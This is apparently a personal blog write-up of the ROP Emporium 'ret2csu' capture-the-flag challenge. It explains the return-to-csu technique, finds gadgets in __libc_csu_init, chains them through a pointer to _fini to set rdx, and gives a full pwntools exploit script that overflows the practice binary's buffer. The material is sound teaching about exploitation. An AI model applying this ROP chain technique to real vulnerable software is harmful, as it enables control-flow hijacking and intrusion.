  1. Introduction
  2. Binary information
  3. __libc_csu_init()
  4. CALL issue
  5. Constructing ROP chain
  6. Conclusion


1. Introduction

This ret2csu challenge from ropemporium.com teaches a new ROP technique presented at Black Hat Asia 2018 called return-to-csu. You can download the binary and read the challenge description from here. After reading the white paper, I found this technique very interesting and decided to give it a try. Here we go:


2. Binary information

peilin@PWN:~/ROP_Emporium/ret2csu$ file ret2csu
ret2csu: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=a799b370a24ba0109f1175f31b3058094b5feab5, not stripped

As always, the binary is dynamically linked.

peilin@PWN:~/ROP_Emporium/ret2csu$ gdb -q ret2csu
Reading symbols from ret2csu…(no debugging symbols found)…done.
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial

NX is enabled. That’s why we ROP.


3. __libc_csu_init()

As required, we need to overflow a buffer, overwrite a return address and return to a function called ret2win(). It sounds pretty simple, but the challenge also requires us to return to the ret2win() with its third parameter set to 0xdeadcafebabebeef. OK…

As we know, according to the System V AMD64 ABI calling convention, a function with three parameters should find its first parameter in %rdi, second in %rsi, and third in %rdx. So let’s see if we can find a pop rdx; ret gadget somewhere in the binary. Note, the challenge assumes that ASLR is turned on, so I can’t directly use gadgets from libc since I can’t easily locate them. Luckily, though, PIE is disabled, so we can still locate gadgets in the binary, if there are any.

gdb-peda$ ropsearch "pop rdx" /home/user/ropemporium.com/ret2csu/ret2csu
Searching for ROP gadget: 'pop rdx' in: /home/user/ropemporium.com/ret2csu/ret2csu ranges
Not found

OK. Let’s try other tools:

peilin@PWN:~/ropemporium.com/ret2csu$ python ROPgadget.py --binary ./ret2csu | grep rdx
0x0000000000400567 : lea ecx, [rdx] ; and byte ptr [rax], al ; test rax, rax ; je 0x40057b ; call rax
0x000000000040056d : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret

Fine. Now we are in trouble, since none of our automatic ROP gadget search tools have found any useful pop rdx; ret gadgets for us. So, here comes our new return-to-csu technique:

peilin@PWN:~/ropemporium.com/ret2csu$ nm -a ret2csu | grep " t\| T"
00000000004008b4 t .fini
0000000000600e18 t .fini_array
0000000000400560 t .init
0000000000600e10 t .init_array
0000000000400580 t .plt
00000000004005f0 t .text
00000000004006a0 t __do_global_dtors_aux
0000000000600e18 t __do_global_dtors_aux_fini_array_entry
0000000000600e10 t __frame_dummy_init_array_entry
0000000000600e18 t __init_array_end
0000000000600e10 t __init_array_start
00000000004008b0 T __libc_csu_fini
0000000000400840 T __libc_csu_init
0000000000400620 T _dl_relocate_static_pie
00000000004008b4 T _fini
0000000000400560 T _init
00000000004005f0 T _start
0000000000400630 t deregister_tm_clones
00000000004006d0 t frame_dummy
00000000004006d7 T main
0000000000400714 t pwnme
0000000000400660 t register_tm_clones
00000000004007b1 T ret2win

The command above lists every symbol that nm reports as t or T inside ret2csu. As we can see, there are a lot of them. Not every entry is a function (some are section names or array entries), and many come from “outside the source code”: they have been statically linked into the binary, even though our binary is dynamically linked. Take __do_global_dtors_aux_fini_array_entry for example:

peilin@PWN:/usr/lib/gcc/x86_64-linux-gnu/7$ file crtbeginS.o
crtbeginS.o: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
peilin@PWN:/usr/lib/gcc/x86_64-linux-gnu/7$ nm -a crtbeginS.o | grep __do_global_dtors_aux_fini_array_entry
0000000000000000 t __do_global_dtors_aux_fini_array_entry

It comes from /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o on my machine. Man, we are dealing with longer and longer symbol names and file paths, aren’t we?

The return-to-csu white paper calls this statically “attached” code, well, “attached code”. The idea is that, since almost all binaries contain this attached code, if we can find useful gadgets inside those functions, we no longer need to count on our luck.

We may ask, though: why did tools like ropsearch and ROPgadget.py fail to find those gadgets if they exist in the attached code? It turns out that the gadgets we are going to use look “weird” enough that our tools are not smart enough to pick them out for us. Luckily, some super smart guys have already done the job. Let’s take a look inside __libc_csu_init():

peilin@PWN:~/ropemporium.com/ret2csu$ gdb -q ret2csu
Reading symbols from ret2csu…(no debugging symbols found)…done.
gdb-peda$ pd __libc_csu_init
Dump of assembler code for function __libc_csu_init:
0x0000000000400840 <+0>: push r15
0x0000000000400842 <+2>: push r14
0x0000000000400844 <+4>: mov r15,rdx
0x0000000000400847 <+7>: push r13
0x0000000000400849 <+9>: push r12
0x000000000040084b <+11>: lea r12,[rip+0x2005be] # 0x600e10
0x0000000000400852 <+18>: push rbp
0x0000000000400853 <+19>: lea rbp,[rip+0x2005be] # 0x600e18
0x000000000040085a <+26>: push rbx
0x000000000040085b <+27>: mov r13d,edi
0x000000000040085e <+30>: mov r14,rsi
0x0000000000400861 <+33>: sub rbp,r12
0x0000000000400864 <+36>: sub rsp,0x8
0x0000000000400868 <+40>: sar rbp,0x3
0x000000000040086c <+44>: call 0x400560 <_init>
0x0000000000400871 <+49>: test rbp,rbp
0x0000000000400874 <+52>: je 0x400896 <__libc_csu_init+86>
0x0000000000400876 <+54>: xor ebx,ebx
0x0000000000400878 <+56>: nop DWORD PTR [rax+rax*1+0x0]
0x0000000000400880 <+64>: mov rdx,r15
0x0000000000400883 <+67>: mov rsi,r14
0x0000000000400886 <+70>: mov edi,r13d
0x0000000000400889 <+73>: call QWORD PTR [r12+rbx*8]
0x000000000040088d <+77>: add rbx,0x1
0x0000000000400891 <+81>: cmp rbp,rbx
0x0000000000400894 <+84>: jne 0x400880 <__libc_csu_init+64>
0x0000000000400896 <+86>: add rsp,0x8
0x000000000040089a <+90>: pop rbx
0x000000000040089b <+91>: pop rbp
0x000000000040089c <+92>: pop r12
0x000000000040089e <+94>: pop r13
0x00000000004008a0 <+96>: pop r14
0x00000000004008a2 <+98>: pop r15
0x00000000004008a4 <+100>: ret
End of assembler dump.

Have you found anything interesting? Spoiler alert:

Gadget 1:

0x000000000040089a <+90>: pop rbx
0x000000000040089b <+91>: pop rbp
0x000000000040089c <+92>: pop r12
0x000000000040089e <+94>: pop r13
0x00000000004008a0 <+96>: pop r14
0x00000000004008a2 <+98>: pop r15
0x00000000004008a4 <+100>: ret

Gadget 2:

0x0000000000400880 <+64>: mov rdx,r15
0x0000000000400883 <+67>: mov rsi,r14
0x0000000000400886 <+70>: mov edi,r13d
0x0000000000400889 <+73>: call QWORD PTR [r12+rbx*8]

In particular, gadget 2 ends with a call instruction, which is atypical for a ROP gadget. It did cause me some trouble, as we will see.

In our case, if we first return to gadget 1, popping 0xdeadcafebabebeef into %r15, and then return to gadget 2, we will have 0xdeadcafebabebeef in %rdx by the time gadget 2 reaches its call, as required. Sounds pretty nice! Let’s get down to work:


4. CALL issue

First we check the return address offset:

gdb-peda$ pattern create 100
‘AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL’
gdb-peda$ r
Starting program: /home/user/ropemporium.com/ret2csu/ret2csu
ret2csu by ROP Emporium

Call ret2win()
The third argument (rdx) must be 0xdeadcafebabebeef

> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

Program received signal SIGSEGV, Segmentation fault.

OK, so our 100 bytes of input caused a segmentation fault.

Stopped reason: SIGSEGV
0x00000000004007b0 in pwnme ()
gdb-peda$ x/i $pc
=> 0x4007b0 <pwnme+156>: ret
gdb-peda$ x/gx $rsp
0x7fffffffe478: 0x4141464141304141
gdb-peda$ pattern offset 0x4141464141304141
4702116732032008513 found at offset: 40
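
The offset lookup above can be reproduced by hand. Here is a minimal sketch using only the standard library; the helper name pattern_offset is mine, not part of peda. It packs the value found at $rsp as a little-endian quadword and searches for those bytes in the cyclic pattern we sent:

```python
import struct

# Cyclic pattern printed by `pattern create 100` in the session above.
PATTERN = (b"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AA"
           b"HAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")


def pattern_offset(pattern: bytes, qword: int) -> int:
    """Return the index where the little-endian bytes of `qword` first occur."""
    needle = struct.pack("<Q", qword)  # x86-64 stores integers little-endian
    return pattern.find(needle)


offset = pattern_offset(PATTERN, 0x4141464141304141)
print(offset)
```

The quadword 0x4141464141304141 is simply the bytes "AA0AAFAA" read in little-endian order, which is why the search lands on the saved return address.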

The offset is 40, so we need 40 dummy bytes before we reach the return address. Our goal is to get 0xdeadcafebabebeef into %r15, then into %rdx, and invoke ret2win(). The %rdx part looks fine, but as I said, the call instruction is a problem:

0x0000000000400889 <+73>: call QWORD PTR [r12+rbx*8]

It will first calculate r12+rbx*8, read the QWORD stored at that address, then call whatever that QWORD points to. In other words, we want r12+rbx*8 to be the address of a pointer to ret2win(). We can easily find the address of ret2win():

gdb-peda$ p ret2win
$1 = {<text variable, no debug info>} 0x4007b1 <ret2win>

It is 0x4007b1, but do we have a pointer pointing at 0x4007b1?

gdb-peda$ find 0x4007b1
Searching for '0x4007b1' in: None ranges
Not found

No, we don’t. 🙁
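
To make the constraint concrete, here is a small sketch of what call QWORD PTR [r12+rbx*8] does. The function name and the dictionary standing in for memory are my own illustration. The single entry assumes that the .init_array slot at 0x600e10 holds the address of frame_dummy (0x4006d0), which is what the symbol name __frame_dummy_init_array_entry suggests but which I have not dumped here:

```python
MASK64 = (1 << 64) - 1


def indirect_call_target(memory: dict, r12: int, rbx: int) -> int:
    """Model `call QWORD PTR [r12+rbx*8]`: read a pointer, return the call target."""
    slot = (r12 + rbx * 8) & MASK64        # effective address of the pointer
    if slot not in memory:
        raise KeyError("no known pointer stored at %#x" % slot)
    return memory[slot]                    # the CPU jumps to the value stored there


# Assumed memory image: .init_array[0] (0x600e10) -> frame_dummy (0x4006d0).
memory = {0x600E10: 0x4006D0}

print(hex(indirect_call_target(memory, r12=0x600E10, rbx=0)))
```

The point is that %r12 cannot hold the address of the function itself; it has to hold the address of a memory slot that already contains that address.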

Sadly, in order to put 0xdeadcafebabebeef into %rdx, we do need both gadget 1 and gadget 2, so we must find a way to deal with that call. After staring at these two gadgets as a whole for a while:

0x0000000000400880 <+64>: mov rdx,r15
0x0000000000400883 <+67>: mov rsi,r14
0x0000000000400886 <+70>: mov edi,r13d
0x0000000000400889 <+73>: call QWORD PTR [r12+rbx*8]
0x000000000040088d <+77>: add rbx,0x1
0x0000000000400891 <+81>: cmp rbp,rbx
0x0000000000400894 <+84>: jne 0x400880 <__libc_csu_init+64>
0x0000000000400896 <+86>: add rsp,0x8
0x000000000040089a <+90>: pop rbx
0x000000000040089b <+91>: pop rbp
0x000000000040089c <+92>: pop r12
0x000000000040089e <+94>: pop r13
0x00000000004008a0 <+96>: pop r14
0x00000000004008a2 <+98>: pop r15
0x00000000004008a4 <+100>: ret

I began to realize that maybe we can call some other function and just let it return. Since it’s a call, execution will resume at the instruction right after it, and after executing the add, cmp, jne and add rsp,0x8 instructions, we will once again run into gadget 1, which can finally ret to our ret2win().

So now we have two more problems:

First, which “placeholder” function should we call, then? Ideally there should be a pointer to it somewhere inside the binary, and ideally it should do nothing, or at least very little. Otherwise it may mess up our registers.

Second, as shown in the disassembly, we have to pass the cmp rbp,rbx test by making %rbp equal to %rbx, so that the jne conditional jump is not taken.

Let’s first deal with the first problem. Referencing this great post by w3ndige, I learned that we can use _fini() which perfectly matches our expectations:

gdb-peda$ pd _fini
Dump of assembler code for function _fini:
0x00000000004008b4 <+0>: sub rsp,0x8
0x00000000004008b8 <+4>: add rsp,0x8
0x00000000004008bc <+8>: ret
End of assembler dump.

Beautiful. The functionality of _fini() is as simple as a ret gadget. So do we have a pointer to it?

gdb-peda$ find 0x4008b4 ret2csu
Searching for '0x4008b4' in: ret2csu ranges
Found 2 results, display max 2 items:
ret2csu : 0x400e48 --> 0x4008b4 (<_fini>: sub rsp,0x8)
ret2csu : 0x600e48 --> 0x4008b4 (<_fini>: sub rsp,0x8)

Wonderful. Thank you so much, peda. The nice thing about it is that, as we may guess, _fini() is also an attached code function that comes from /usr/lib/x86_64-linux-gnu/crti.o:

peilin@PWN:/usr/lib/x86_64-linux-gnu$ file crti.o
crti.o: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
peilin@PWN:/usr/lib/x86_64-linux-gnu$ nm -a crti.o | grep _fini
0000000000000000 T _fini

This means this solution may also work elsewhere.
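
The pointer search that peda did for us above can be approximated without a debugger. This is a minimal sketch, with find_pointers being a hypothetical helper of mine: it scans raw bytes for the little-endian encoding of an address. The image below is synthetic (zeros with one pointer planted at offset 0xe48) so that the snippet runs on its own:

```python
import struct


def find_pointers(image: bytes, target: int) -> list:
    """Return every offset in `image` where `target` is stored as a 64-bit pointer."""
    needle = struct.pack("<Q", target)
    hits = []
    pos = image.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = image.find(needle, pos + 1)
    return hits


# Synthetic stand-in for the file contents: one pointer to _fini at offset 0xe48.
image = b"\x00" * 0xE48 + struct.pack("<Q", 0x4008B4) + b"\x00" * 8

print([hex(off) for off in find_pointers(image, 0x4008B4)])
```

Run against the real file contents (for example the bytes returned by open("ret2csu", "rb").read()), the hits are file offsets rather than virtual addresses, so they still have to be translated through the segment mappings. Both peda results end in 0xe48, which would be consistent with the same file bytes being visible through two mappings, although I have not verified that here.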

Remember after returning from _fini() we still have to deal with the conditional jump:

0x000000000040088d <+77>: add rbx,0x1
0x0000000000400891 <+81>: cmp rbp,rbx
0x0000000000400894 <+84>: jne 0x400880 <__libc_csu_init+64>
0x0000000000400896 <+86>: add rsp,0x8

Luckily we can control the value for both %rbp and %rbx in gadget 1. We can set %rbp 0x1 larger than %rbx so that after add rbx,0x1 they will be equal and we will be able to fall through the jne, reach gadget 1 again and finally ret to ret2win().
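
As a quick check of that arithmetic, here is a tiny sketch of the loop-exit test. The function name is mine; it mirrors add rbx,0x1 followed by cmp rbp,rbx and jne, including the 64-bit wraparound:

```python
MASK64 = (1 << 64) - 1


def falls_through(rbx: int, rbp: int) -> bool:
    """True when `add rbx,0x1; cmp rbp,rbx; jne` does NOT jump back to gadget 2."""
    rbx = (rbx + 1) & MASK64   # add rbx,0x1
    return rbp == rbx          # jne is taken only when the two differ


print(falls_through(rbx=0, rbp=1))   # the values we are going to use
print(falls_through(rbx=0, rbp=0))   # would loop back and call again
```

Choosing %rbx = 0 has the extra benefit that r12+rbx*8 is just %r12, so %r12 can hold the pointer address directly.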


5. Constructing ROP chain

Now we are ready to design our payload. It will be pretty long, since we are actually using gadget 1 twice. Anyway:

         ...lower addresses...

:::::::::::::::::::::::::::::::::::::
|          (40 dummy bytes)         |
+-----------------------------------+
|    address of:      gadget 1      |
+-----------------------------------+
|                 0                 | %rbx = 0
+-----------------------------------+ 
|                 1                 | %rbp = 1
+-----------------------------------+
|    pointer to:       _fini()      | %r12 = 0x600e48, now QWORD PTR [r12+rbx*8] points at _fini()
+-----------------------------------+
|             junk value            | we don’t care about %r13
+-----------------------------------+ 
|             junk value            | we don’t care about %r14
+-----------------------------------+
|         0xdeadcafebabebeef        | %r15 = 0xdeadcafebabebeef
+-----------------------------------+
|    address of:      gadget 2      |
+-----------------------------------+
|             junk value            | “add rsp,0x8”
+-----------------------------------+
|             junk value            | we don’t care about %rbx anymore
+-----------------------------------+
|             junk value            | we don’t care about %rbp anymore
+-----------------------------------+
|             junk value            | we don’t care about %r12 anymore 
+-----------------------------------+
|             junk value            | we don’t care about %r13 
+-----------------------------------+
|             junk value            | we don’t care about %r14
+-----------------------------------+
|             junk value            | we don’t care about %r15 anymore, since 0xdeadcafebabebeef has already been copied into %rdx
+-----------------------------------+
|    address of:      ret2win       | return to win!
+-----------------------------------+

         ...higher addresses...
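
Before touching the binary, the layout above can be sanity-checked with a toy emulator. This is only a sketch under stated assumptions: it models nothing but the two gadgets, treats _fini() as a function that returns without changing any register we care about, and uses the addresses from the gdb session. run_chain is a name I made up:

```python
GADGET1 = 0x40089A   # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
GADGET2 = 0x400880   # mov rdx,r15; mov rsi,r14; mov edi,r13d; call [r12+rbx*8]
FINI = 0x4008B4
FINI_PTR = 0x600E48
RET2WIN = 0x4007B1
MAGIC = 0xDEADCAFEBABEBEEF
MASK64 = (1 << 64) - 1


def run_chain(chain, memory):
    """Consume the quadwords that follow the padding; return (final target, regs)."""
    stack = list(chain)
    regs = {}
    pc = stack.pop(0)                                 # the ret at the end of pwnme()
    while True:
        if pc == GADGET1:
            for name in ("rbx", "rbp", "r12", "r13", "r14", "r15"):
                regs[name] = stack.pop(0)
            pc = stack.pop(0)                         # ret
        elif pc == GADGET2:
            regs["rdx"] = regs["r15"]
            regs["rsi"] = regs["r14"]
            regs["rdi"] = regs["r13"] & 0xFFFFFFFF    # mov edi,r13d zero-extends
            target = memory[(regs["r12"] + regs["rbx"] * 8) & MASK64]
            if target != FINI:
                raise NotImplementedError("only a call to _fini() is modelled")
            regs["rbx"] = (regs["rbx"] + 1) & MASK64  # add rbx,0x1
            if regs["rbp"] != regs["rbx"]:            # cmp rbp,rbx; jne
                raise RuntimeError("jne taken: the loop would call again")
            stack.pop(0)                              # add rsp,0x8
            pc = GADGET1                              # fall through into the pops
        else:
            return pc, regs


chain = [GADGET1, 0, 1, FINI_PTR, 0, 0, MAGIC, GADGET2] + [0] * 7 + [RET2WIN]
target, regs = run_chain(chain, {FINI_PTR: FINI})
print(hex(target), hex(regs["rdx"]))
```

If the emulator ends at ret2win with the magic value in rdx, the number of junk quadwords after gadget 2 (one for add rsp,0x8 plus six pops) is right.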

By the way, now I have a good reason to draw stack layout figures “upside-down”: I want the comments to follow the order in which those bytes are popped off, and it would be pretty weird to read them from the bottom up. Really going to need some mental flexibility, I guess…

Anyways. It’s time to write some Python:

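#exp.py
from pwn import *

elf = context.binary = ELF('ret2csu')
print("Address of __libc_csu_init(): %#x" % elf.symbols.__libc_csu_init)
print("Address of ret2win()        : %#x" % elf.symbols.ret2win)

p = process(elf.path)

# 40 bytes of padding reach the saved return address (bytes, so this also runs on Python 3)
pad     = b"A" * 40

# Gadget 1: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
gadget1 = p64(elf.symbols.__libc_csu_init + 90)

rbx     = p64(0)
rbp     = p64(1)                   # rbx + 1, so the jne falls through
r12     = p64(0x600e48)            # address of a pointer to _fini()
junk    = p64(0)
r15     = p64(0xdeadcafebabebeef)  # copied into rdx by gadget 2
ret2win = p64(elf.symbols.ret2win)

# Gadget 2: mov rdx,r15; mov rsi,r14; mov edi,r13d; call QWORD PTR [r12+rbx*8]
gadget2 = p64(elf.symbols.__libc_csu_init + 64)

payload =  pad
payload += gadget1 + rbx + rbp + r12 + (junk * 2) + r15
payload += gadget2 + (junk * 7)    # one slot for add rsp,0x8, then six pops
payload += ret2win

p.recvuntil(b"\n> ")
p.sendline(payload)

p.interactive()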

Let’s try it out:

peilin@PWN:~/ropemporium.com/ret2csu$ python exp.py
[*] '/home/user/ropemporium.com/ret2csu/ret2csu'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Address of __libc_csu_init(): 0x400840
Address of ret2win()        : 0x4007b1
[+] Starting local process '/home/user/ropemporium.com/ret2csu/ret2csu': pid 8659
[*] Switching to interactive mode
ROPE{a_placeholder_32byte_flag!}

Nice.

Note that I’m still using my Ubuntu 18.04.3 VM and ret2win() in fact calls system(), so the movaps issue is still lurking. This time we are lucky and the exploit works as is. If it didn’t, we could always prepend a ret gadget to our ROP chain, or add 0x1 to the address of ret2win() to jump over its first push rbp instruction, in order to make the stack 16-byte aligned. Choosing the latter will actually mess up the stack frame pointer once we exit from our shell, but we don’t really care.
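
For reference, the two alignment workarounds mentioned above could be sketched like this. It uses struct only, so p64 here is my own stand-in for the pwntools helper, and build_payload and its fix argument are hypothetical names. The lone ret at 0x4008a4 is the last instruction of __libc_csu_init() in the disassembly earlier. I have not needed either variant on my machine, and the version with the extra ret is 8 bytes longer, so it assumes pwnme() reads at least that much input:

```python
import struct

GADGET1, GADGET2 = 0x40089A, 0x400880
RET = 0x4008A4            # the plain `ret` that ends __libc_csu_init()
FINI_PTR = 0x600E48
RET2WIN = 0x4007B1
MAGIC = 0xDEADCAFEBABEBEEF


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian quadword (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)


def build_payload(fix: str = "none") -> bytes:
    """fix is 'none', 'ret' (extra ret up front) or 'skip_push' (enter at ret2win+1)."""
    win = RET2WIN + 1 if fix == "skip_push" else RET2WIN
    chain = [GADGET1, 0, 1, FINI_PTR, 0, 0, MAGIC, GADGET2] + [0] * 7 + [win]
    if fix == "ret":
        chain.insert(0, RET)   # shifts rsp by 8 bytes before the real chain starts
    return b"A" * 40 + b"".join(p64(q) for q in chain)


for fix in ("none", "ret", "skip_push"):
    print(fix, len(build_payload(fix)))
```

Either variant changes the stack pointer seen inside ret2win() by 8 bytes relative to the original chain, which is the whole point of the workaround.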


6. Conclusion

So that was ret2csu from ROP Emporium. Learning new techniques is always exciting and I really enjoyed this challenge. Return-to-csu gives us a general way of finding ROP gadgets, which is nice. While searching for information about this exploitation technique, I sometimes saw people commenting that most of the time you don’t really need it, since real-life binaries are typically large enough to already contain all the gadgets we are going to need. Well, that does make sense to some extent, but I believe it’s always good to know.

So that’s it! See you next time!